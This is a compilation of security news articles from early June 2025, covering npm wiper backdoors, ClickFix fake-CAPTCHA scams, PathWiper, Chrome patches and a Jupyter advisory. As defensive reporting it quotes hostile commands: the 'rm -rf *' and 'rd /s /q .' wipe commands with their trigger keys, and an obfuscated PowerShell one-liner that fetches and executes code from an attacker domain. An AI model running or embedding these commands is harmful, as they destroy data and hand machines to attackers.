Malicious npm packages found with hidden endpoints that wipe systems on command. Devs warned to check dependencies for express-api-sync, system-health-sync-api.

Security researchers have identified two npm packages that do far more than they claim. Disguised as utilities for system monitoring and data syncing, these packages introduce destructive backdoors that can remotely wipe out all files in a developer’s application, on demand.

Socket’s Threat Research Team exposed the malicious packages, express-api-sync and system-health-sync-api, both published under the npm account “botsailer.” While the names suggest harmless functionality, the underlying code tells a much darker story.

****A Dangerous Disguise****

According to the company’s technical report shared with Hackread.com, the express-api-sync package presents itself as a simple tool for syncing databases. But instead of syncing anything, it injects a hidden HTTP POST endpoint (/api/this/that) into any Express app that includes it.

Once triggered with the hardcoded key “DEFAULT\_123,” it executes the Unix command rm -rf *, effectively erasing everything in the application’s current directory, source code, configs, user uploads, and even local databases.

This attack activates silently. No logs, no console output, and thanks to an empty error handler, no indication if the route registration fails. Most developers wouldn’t notice anything unusual until it’s too late.

****Sophisticated Threat****

While express-api-sync is destructive, system-health-sync-api takes things further. It’s structured like a real system monitor, complete with a functioning health check, SMTP integration, and dynamic support for Express, Fastify, and even raw HTTP servers.

Beneath the surface, it gathers server data, hostname, IP, process ID, and environment hash, and sends it via email to a hardcoded address: anupm019@gmailcom. It even logs backend URLs, helping attackers map server infrastructure.

This package supports cross-platform file deletion: rm -rf * for Unix-based systems and rd /s /q . for Windows, a command that doesn’t just delete files, it wipes the current directory entirely.

****Built-In Command and Control****

The backdoor can be triggered via two POST endpoints (/_/system/health and /_/sys/maintenance), each requiring the secret key “HelloWorld.” Developers might think the configuration is customizable, but default values ensure the attacker’s access works unless settings are explicitly overridden.

Email is used as a covert control channel. SMTP credentials are baked into the package, masked with Base64 encoding but easily decoded. When the system starts, the malware checks connectivity to the mail server. If successful, it confirms that the attacker’s command channel is active.

****How It Works Behind the Scenes****

1.  **Reconnaissance**: A GET request to /_/system/health returns system info.
2.  **Dry Run (optional)**: If configured, attackers can test without causing damage.
3.  **Destruction**: A POST request with the right key triggers full file deletion.
4.  **Notification**: Email alerts are sent with detailed server fingerprints and backend URLs.

The package even adjusts responses to help attackers understand when keys are incorrect, offering hints on proper usage.

Analysis of the malicious express-api-sync package by Socket’s AI-powered scanner (Via Socket)

Most supply chain attacks focus on stealing data or cryptocurrency. These two packages aim for destruction. It’s a shift in motivation, from profit to sabotage. Attackers now appear more interested in taking systems offline, collecting infrastructure intel, or disrupting competitors. And they’re building tools that can sit dormant, gather information, and activate when least expected.

The use of middleware makes this even more dangerous. Middleware runs on every request and often has full access to app internals. These packages exploit that trust, quietly embedding routes with the power to destroy an entire production environment.

Jim Routh, Chief Trust Officer at Saviynt, commented on the latest development, stating, “This is a case of a software supply chain compromise using malware designed to appear to be benign that then activates a back door once it is embedded. The key for enterprises is to improve the identity access management for everyone with access to the software build process including employees and contractors.”

Developers and DevOps teams should review their dependencies immediately. Use behavioural scanning tools that inspect what packages do, not just what they claim. Traditional scanners miss these threats because they don’t look at runtime behaviour.

Hidden Backdoors in npm Packages Let Attackers Wipe Entire Systems

A list of topics we covered in the week of June 1 to June 7 of 2025

June 6, 2025 - How to update Chrome on every Operating System (Windows, Mac, Linux, Chrome OS, Android, iOS)

June 6, 2025 - Cybercriminals are abusing the hospitality industry and its booking platforms to defraud the travelers that visit them

June 5, 2025 - Ransomware has been discovered by security researchers in fake installers posing as Chat GPT, Nova Leads, and InVideo AI.

June 4, 2025 - Google has released an important update for Chrome, patching one actively exploited zero-day and two other security flaws

June 3, 2025 - As scammers develop new ways of exploiting unsuspecting users, Malwarebytes is introducing Scam Guard to combat this new wave of threats.

 A week in security (June 1 &#8211; June 7) 

How to update Chrome on every Operating System (Windows, Mac, Linux, Chrome OS, Android, iOS)

We often write about important updates for the most popular browser, Google Chrome. Since it would be out of scope to post elaborate update instructions for every possible platform and operating system (OS)—like iOS, macOS, Windows, Android, etc.—we decided to turn this topic into a separate post that is easy to find (and link to). Also, keep in mind that not every update will be available for every platform or at the same time. You can find when the latest update for your operating system was released on this Google Chrome releases website.

Keeping your Google Chrome browser up to date is essential for security, performance, and access to the latest features. Whether you’re on Windows, Mac, Linux, Android, or iOS, updating Chrome is straightforward, if you know where to look.

But first a few words about the version numbers, because they can be confusing at times.

The Chrome version number consists of four parts separated by dots, like this:

**MAJOR.MINOR.BUILD.PATCH**

Each part has a specific meaning. In order of relevance they are:

*   **MAJOR**: This number increases with significant releases that may include major new features or changes. It usually raises in increments about 7 – 8 times per year, roughly every 6 weeks, reflecting Chrome’s release cycle.
*   **MINOR**: This number is typically zero and rarely changes. It mainly supports the versioning scheme but doesn’t usually affect how users track updates.
*   **BUILD**: This number increases steadily and represents a specific snapshot of Chrome’s source code at a given time. It advances with each new build candidate and is the key indicator of how recent the core code is.
*   **PATCH**: This number changes in increments for smaller fixes and security patches applied to a particular build. It resets with each new build and helps identify minor updates within the same build.

For example, a version like **137.0.7151.56** means:

*   Major version 137 (the milestone release)
*   Minor version 0 (standard)
*   Build number 7151 (the code snapshot)
*   Patch number 56 (the latest fix on that build)

**Why does the version number matter?**

The **BUILD** and **PATCH** numbers together uniquely identify the exact code you are running. Even if two versions share the same major number, a higher build or patch number means you have a newer, more up-to-date Chrome version.

Sometimes you might see slightly different patch numbers on the same major build, for example, **118.0.5993.117** vs. **118.0.5993.118**. This usually happens because Google released a quick fix or minor patch shortly after the initial release. Both are part of the same major update, but the higher patch number is newer.

**How to check if you have the latest version**

To verify your Chrome version:

1.  Open Chrome.
2.  Click the three-dot menu (⋮) in the top-right corner.
3.  Go to **Help** > **About Google Chrome**.

Chrome will display your current version and automatically check for updates. If a newer version is available, it will download and prompt you to relaunch once it’s ready updating.

Chrome is updating

**Update Chrome on Windows**

Method 1: Use Chrome’s built-in update feature

1.  Open Chrome.
2.  Click the three-dot menu icon (⋮) in the top-right corner.
3.  Hover over **Help**, then click **About Google Chrome**.
4.  Chrome will automatically check for updates and download them if available.
5.  Once downloaded, click **Relaunch** to complete the update.

To enable automatic updates for Google Chrome on Windows, ensure that the “**Automatically update Chrome for all users**” option is enabled in Chrome’s settings. You can find this setting by going to “**About Google Chrome**” within the Chrome settings. Closing and restarting Chrome may be required to apply the update. 

Method 2: using Windows Update (for Chrome Enterprise)

If your organization manages Chrome updates via Windows Update or group policies, updates may be automatic. Contact your IT admin if you don’t see updates.

Method 1: For each device

1.  Open Chrome.
2.  Click the three-dot menu icon (⋮) at the top-right.
3.  Select **Help** > **About Google Chrome**.
4.  Chrome will check for updates and install them automatically.
5.  Click **Relaunch** to finish updating.

You can also set up automatic browser updates for all users of your computer if Google Chrome is installed in your Applications folder. Go to “**About Google Chrome**,” and click **Automatically update Chrome for all users**.

Method 2: For Chrome Enterprise

As a Mac administrator, you can use Google Software Update to manage Chrome browser and Chrome apps updates on your users’ Mac computers.

**Update Chrome on Linux**

Chrome updates on Linux depend on your distribution and how you installed it.

For Debian/Ubuntu-based systems:

1.  Open a terminal.
2.  Run:

sudo apt update

sudo apt --only-upgrade install google-chrome-stable

3.  Restart Chrome to apply updates.

For Fedora/openSUSE:

1.  Open a terminal.
2.  Run:

sudo dnf upgrade google-chrome-stable

3.  Restart Chrome.

If you installed Chrome via a package manager, it should handle updates automatically when you update your system.

**Update Chrome on Android**

Chrome updates on Android are handled through the Google Play Store:

1.  Open the **Google Play Store** app.
2.  Tap your profile icon (top right).
3.  Select **Manage apps & device**.
4.  Under **Updates available**, look for **Chrome**.
5.  Tap **Update** next to Chrome if available.

Alternatively, if you have auto-updates enabled, Chrome updates automatically. To enable auto-updates for Android apps, open the Google Play Store, tap your profile picture, go to “Manage apps and device,” and then tap “Manage.” Select the app you want to update automatically, tap the “More” button, and toggle on “Enable auto-update.”

**Update Chrome on iOS (iPhone and iPad)**

Chrome updates on iOS come through the Apple App Store:

1.  Open the **App Store**.
2.  Tap your profile icon at the top right.
3.  Scroll down to **Available Updates**.
4.  Find **Google Chrome** and tap **Update**.

If auto-updates are enabled on your device, Chrome updates automatically.

Chrome in App Store’s recently updated section

**Updating Chrome on Chrome OS**

Chrome OS updates include Chrome browser updates:

1.  Click the time in the bottom-right corner.
2.  Click the **Settings** gear icon.
3.  In the left menu, select **About Chrome OS**.
4.  Click **Check for updates**.
5.  If an update is available, it will download and install automatically.
6.  Restart your Chromebook to complete the update.

Summary table of update methods

**Platform**

**Update Method**

**Notes**

Windows

Chrome Menu > Help > About Chrome

Manual or automatic update

macOS

Chrome Menu > Help > About Chrome

Manual or automatic update

Linux

Package manager commands

Varies by distro

Android

Google Play Store

Manual or automatic update

iOS

Apple App Store

Manual or automatic update

Chrome OS

Settings > About Chrome OS

System update

If you still have questions about updating the Chrome browser, let us know in the comments and allow us to update this article.

 How to update Chrome on every operating system 

Cofense Intelligence uncovers a surge in ClickFix email scams impersonating Booking.com, delivering RATs and info-stealers. Learn how these…

Cofense Intelligence uncovers a surge in ClickFix email scams impersonating Booking.com, delivering RATs and info-stealers. Learn how these sophisticated attacks trick users into running malware and what to watch out for.

Cybersecurity experts at Cofense Intelligence are warning hotel chains and other businesses in the food and accommodation sector about an email scam that mimics Booking.com. These deceptive emails are part of attack campaigns known as ClickFix, which aims to trick users into running malicious software.

The ClickFix campaign has been steadily gaining traction since November 2024, with a notable acceleration in recent months. According to Cofense’s analysis, a staggering 47% of the total campaign volume was observed in March 2025 alone.

The firm’s active threat reports (ATRs) indicate that 75% of all incidents involving fake CAPTCHAs utilized Booking.com-themed ClickFix templates. While Booking.com impersonations are most common, Cofense also noted less frequent variations, including those spoofing Cloudflare Turnstile and cookie consent banners.

****How the Scam Works****

The scam begins with an email containing a link to a fake CAPTCHA website. A CAPTCHA is usually a test designed to tell humans and computers apart, like typing distorted letters. In this case, however, the fake CAPTCHA is a trick. Instead of a real verification code, clicking on it delivers a harmful script to the user’s computer.

These ClickFix websites then instruct users to press specific keyboard shortcuts, typically Windows key + R, followed by Ctrl + V, and then Enter. This sequence opens the Run command in Windows, pastes the hidden malicious script, and then executes it. The malicious script often includes extra characters that look like a _verification code_ to hide the real harmful commands.

These sites are cleverly designed to look like legitimate pages from well-known brands such as Booking.com and Cloudflare. Interestingly, the scam only targets Windows computers, and if accessed on other devices, the fake CAPTCHA sites will display a message indicating they only work on Windows.

****What Malware is Being Delivered?****

Once the malicious script is run, it can install various types of dangerous software. The most common payload seen in these attacks is XWorm RAT, a type of Remote Access Trojan (RAT). For your information, RATs allow attackers to secretly control a victim’s computer from a distance.

Other frequently observed malware include Pure Logs Stealer and DanaBot, which are information stealers designed to swipe sensitive data. In some instances, both RATs and information stealers have been delivered in a single attack.

Sample Attack Chain (Source: Cofense)

This ClickFix method is a concerning new tactic because it manipulates users into activating the malware themselves, without needing to download any files directly. It highlights the importance of being cautious about suspicious emails, even those that appear to be from trusted sources like Booking.com, and to always double-check the legitimacy of any verification steps or prompts that ask you to run commands on your computer.

For more detailed information on how to spot these ClickFix attacks, refer to Hackread.com’s guide on the techniques used to trick users and how to stay safe.

ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware

Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper.”

Thursday, June 5, 2025 06:00

*   Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. 
*   The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints. 
*   Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities.  
*   The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war. 

**Proliferation of PathWiper **

Any commands issued by the administrative tool’s console were received by its client running on the endpoints. The client then executed the command as a batch (BAT) file, with the command line partially resembling that of Impacket command executions, though such commands do not necessarily indicate the presence of Impacket in an environment.

The BAT file consisted of a command to execute a malicious VBScript file called ‘uacinstall.vbs’, also pushed to the endpoint by the administrative console: 

C:\\WINDOWS\\System32\\WScript.exe C:\\WINDOWS\\TEMP\\uacinstall.vbs

Upon execution, the VBScript wrote the PathWiper executable, named ‘sha256sum.exe’, to disk and executed it: 

C:\\WINDOWS\\TEMP\\sha256sum.exe 

Throughout the course of the attack, filenames and actions used were intended to mimic those deployed by the administrative utility’s console, indicating that the attackers had prior knowledge of the console and possibly its functionality within the victim enterprise’s environment.

**PathWiper capabilities **

On execution, PathWiper replaces the contents of artifacts related to the file system with random data generated on the fly. It first gathers a list of connected storage media on the endpoint, including: 

*   Physical drive names 
*   Volume names and paths 
*   Network shared and unshared (removed) drive paths 

Although most storage devices and volumes are discovered programmatically (via APIs), the wiper also queries ‘HKEY\_USERS\\Network\\<drive\_letter>| RemovePath’ to obtain the path of shared network drives for destruction. 

Once all the storage media information has been collected, PathWiper creates one thread per drive and volume for every path recorded and overwrites artifacts with randomly generated bytes. The wiper reads multiple file systems attributes, such as the following from New Technology File System (NTFS). PathWiper then overwrites the contents/data related to these artifacts directly on disk with random data: 

*   MBR 
*   $MFT 
*   $MFTMirr 
*   $LogFile 
*   $Boot 
*   $Bitmap 
*   $TxfLog 
*   $Tops 
*   $AttrDef 

Before overwriting the contents of the artifacts, the wiper also attempts to dismount volumes using the ‘FSCTL\_DISMOUNT\_VOLUME IOCTL’ to the MountPointManager device object. PathWiper also destroys files on disk by overwriting them with randomized bytes. 

PathWiper’s mechanisms are somewhat semantically similar to another wiper family, HermeticWiper, previously seen targeting Ukrainian entities in 2022. HermeticWiper, also known as FoxBlade or NEARMISS, is attributed to Russia’s Sandworm group in third-party reporting with medium to high confidence. Both wipers attempt to corrupt the master boot record (MBR) and NTFS-related artifacts.  

 A significant difference between HermeticWiper and PathWiper is the corruption mechanisms used against recorded drives and volumes. PathWiper programmatically identifies all connected (including dismounted) drives and volumes on the system, identifies volume labels for verification and documents valid records. This differs from HermeticWiper's simple process of enumerating physical drives from 0 to 100 and attempting to corrupt them. 

**Coverage **

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

Snort 2 rules: 64742, 64743 

Snort 3 rules: 301174

**Indicators of compromise (IOCs) **

7C792A2B005B240D30A6E22EF98B991744856F9AB55C74DF220F32FE0D00B6B3

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine

## Impact

On Windows, the shared `%PROGRAMDATA%` directory is searched for configuration files (`SYSTEM_CONFIG_PATH` and `SYSTEM_JUPYTER_PATH`), which may allow users to create configuration files affecting other users.

Only shared Windows systems with multiple users and unprotected `%PROGRAMDATA%` are affected.

## Mitigations

- upgrade to `jupyter_core>=5.8.1` (5.8.0 is patched but breaks `jupyter-server`) , or
- as administrator, modify the permissions on the `%PROGRAMDATA%` directory so it is not writable by unauthorized users, or
- as administrator, create the `%PROGRAMDATA%\jupyter` directory with appropriately restrictive permissions, or
- as user or administrator, set the `%PROGRAMDATA%` environment variable to a directory with appropriately restrictive permissions (e.g. controlled by administrators _or_ the current user)

## Credit

Reported via Trend Micro Zero Day Initiative as ZDI-CAN-25932

**Impact**

On Windows, the shared %PROGRAMDATA% directory is searched for configuration files (SYSTEM_CONFIG_PATH and SYSTEM_JUPYTER_PATH), which may allow users to create configuration files affecting other users.

Only shared Windows systems with multiple users and unprotected %PROGRAMDATA% are affected.

**Mitigations**

*   upgrade to jupyter_core>=5.8.1 (5.8.0 is patched but breaks jupyter-server) , or
*   as administrator, modify the permissions on the %PROGRAMDATA% directory so it is not writable by unauthorized users, or
*   as administrator, create the %PROGRAMDATA%\jupyter directory with appropriately restrictive permissions, or
*   as user or administrator, set the %PROGRAMDATA% environment variable to a directory with appropriately restrictive permissions (e.g. controlled by administrators _or_ the current user)

**Credit**

Reported via Trend Micro Zero Day Initiative as ZDI-CAN-25932

**References**

*   GHSA-33p9-3p43-82vq
*   https://nvd.nist.gov/vuln/detail/CVE-2025-30167

GHSA-33p9-3p43-82vq: Jupyter Core on Windows Has Uncontrolled Search Path Element Local Privilege Escalation Vulnerability

Google has released an important update for Chrome, patching one actively exploited zero-day and two other security flaws

Google has released an update for the Chrome browser to patch an actively exploited flaw.

The update brings the Stable channel to versions 137.0.7151.68/.69 for Windows and Mac and 137.0.7151.68 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click the “**more menu**” (three stacked dots) **\>**  **Settings > About Chrome**. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from the vulnerability.

_The About Chrome menu while updating_

This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to exploit a specially crafted HTML page (website).

**Technical details**

The vulnerability tracked as CVE-2025-5419 is an out-of-bounds read and write in Google Chrome’s “V8,” which is the engine that Google developed for processing JavaScript. Prior to Google Chrome version 137.0.7151.68, this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

V8 has been a significant source of security problems in the past.

An out-of-bounds read and write vulnerability means that the attacker can manipulate parts of the device’s memory that should be out of their reach. Such a flaw in a program allows it to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers can write code to a part of the memory where the system executes it with permissions that the program and user should not have.

Google knows that attackers currently exploit CVE-2025-5419 in the wild, but released no details yet on who exploits the flaw, how they do it in real-world attacks, or who the targets are in those attacks. However, the Google Threat Analysis Group (TAG) team, which discovered the exploit, focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.

This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability.

**We don’t just report on** **browser vulnerabilities**. Malwarebytes’ Browser Guard protects your browser against malicious websites and credit card skimmers, blocks unwanted ads, and warns you about relevant data breaches and scams.

 Google fixes another actively exploited vulnerability in Chrome, so update now! 

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems.
According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments.
"Chaos RAT is an open-source RAT written in

Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

Silver Spring, Maryland, 3rd June 2025, CyberNewsWire

**Silver Spring, Maryland, June 3rd, 2025, CyberNewsWire**

Aembit, the workload identity and access management (IAM) company, today announced a major expansion of its platform to support Microsoft environments. With this launch, enterprises can now enforce secure, policy-based access for software workloads and agentic AI running on Windows Server, Active Directory, Microsoft Entra ID, and Azure – while extending that same access model to third-party clouds, SaaS tools, and partner environments.

Modern infrastructure rarely lives in one place. While Microsoft technologies remain core to many enterprises, workloads routinely connect across trust boundaries – from on-prem infrastructure to Azure, AWS, Google Cloud, and external APIs.

As infrastructure shifts to the cloud, identity and access management across all these resources becomes increasingly fragmented and complex, especially for non-human entities such as applications, scripts, AI agents, and services. With this launch, Aembit enables a unified approach to secure workload access management across the Microsoft ecosystem and beyond, reducing operational complexity while improving visibility, automation, and risk posture.

> “Security teams require consistent enforcement across all environments – not different tools and rules for every platform,” said Kevin Sapp, co-founder and CTO of Aembit. “We built this integration to help enterprises modernize without compromise, providing policy-driven access across all Microsoft workloads, whether they run on-prem or in the cloud.”

With this launch, Aembit delivers:

*   **Consistent access control for non-human identities**: Teams can now centrally define and enforce access policies for applications, agents, and services across Windows Server, Active Directory, Microsoft Entra ID, and Azure. They can extend the same model to non-Microsoft resources such as AWS, GCP, or SaaS services.
*   **Accelerated cloud migrations without added risk**: As workloads move from on-prem to Azure, Aembit ensures their access remains secure, secretless, and aligned with zero trust principles.
*   **Elimination of static credentials**: By replacing long-lived secrets with short-lived, identity-based access, Aembit helps reduce attack surface and developer overhead.
*   **Unified visibility for audit and compliance**: All workload access is logged and attributed, making it easier to investigate incidents and meet compliance requirements across hybrid Microsoft environments.

These features build on Aembit’s mission to proactively secure access for the growing number of non-human identities operating across modern IT environments. Aembit replaces static credentials with just-in-time, identity-based access – helping builders move faster while giving security teams confidence in how workloads connect across hybrid environments.

Aembit is now available in the Azure Marketplace, making it easier for organizations to integrate workload IAM into their Microsoft-based infrastructure with familiar procurement workflows.

**About Aembit**

Aembit is the leading provider of workload identity and access management solutions, designed to secure non-human identities like applications, AI agents, and service accounts across on-premises, SaaS, cloud, and partner environments. Aembit’s no-code platform enables organizations to enforce access policies in real time, ensuring the security and integrity of critical infrastructure. Users can visit aembit.io and follow us on LinkedIn.

**Contact**

**Apurva Davé**  
**Aembit**  
**\[email protected\]**

Aembit Extends Workload IAM to Microsoft Ecosystem, Securing Hybrid Access for Non-Human Identities

We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha prompt

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device

If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users

The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning

“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase   at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

**IOCs**

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter\[.\]com

(booking.)badgustrewivers.com\[.\]com

(booking.)property-paids\[.\]com

(booking.)rewiewqproperty\[.\]com

(booking.)extranet-listing\[.\]com

(booking.)guestsalerts\[.\]com

(booking.)gustescharge\[.\]com

kvhandelregis\[.\]com

patheer-moreinfo\[.\]com

guestalerthelp\[.\]com

rewiewwselect\[.\]com

hekpaharma\[.\]com

bkngnet\[.\]com

partnervrft\[.\]com

Malwarebytes blocks the download from bkngnet\[.\]com

**How to stay safe**

There are a few things you can do to protect yourself from falling victim to these and similar methods:

*   Do not follow instructions provided by a website you visited without thinking it through.
*   Use an active anti-malware solution that blocks malicious websites and scripts.
*   Use a browser extension that blocks malicious domains and scams.
*   Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Tag

#windows